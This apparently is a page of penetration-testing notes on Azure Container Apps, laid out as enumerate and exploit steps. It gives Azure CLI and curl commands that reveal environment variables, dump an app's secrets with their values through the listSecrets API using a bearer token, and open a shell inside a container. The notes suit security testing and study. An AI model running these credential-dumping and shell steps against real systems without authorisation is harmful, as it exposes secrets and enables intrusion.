container

Identify container apps

Enumerate

General info (Also shows environment variables!)

az containerapp show --name <containerapp> --resource-group <group>

Exploit

Secrets

az containerapp secret list -n <containerapp> -g <group> --show-values

or with curl

armtoken="accesstoken"
 
curl -X POST "https://management.azure.com/subscriptions/<TENTANTID>/resourceGroups/<GROUP>/providers/Microsoft.App/containerApps/<CONTAINERNAME>/listSecrets?api-version=2024-03-01" \
-H "Authorization: Bearer $armtoken" \
-H "Content-Type: application/json" \
-H "Content-Length: 0"

Execute command

az containerapp exec --name <containerapp> --resource-group <group>

After execution: managed_identity_and_apps

Azure Notes

Explorer

container_apps

Identify container apps

Enumerate

Exploit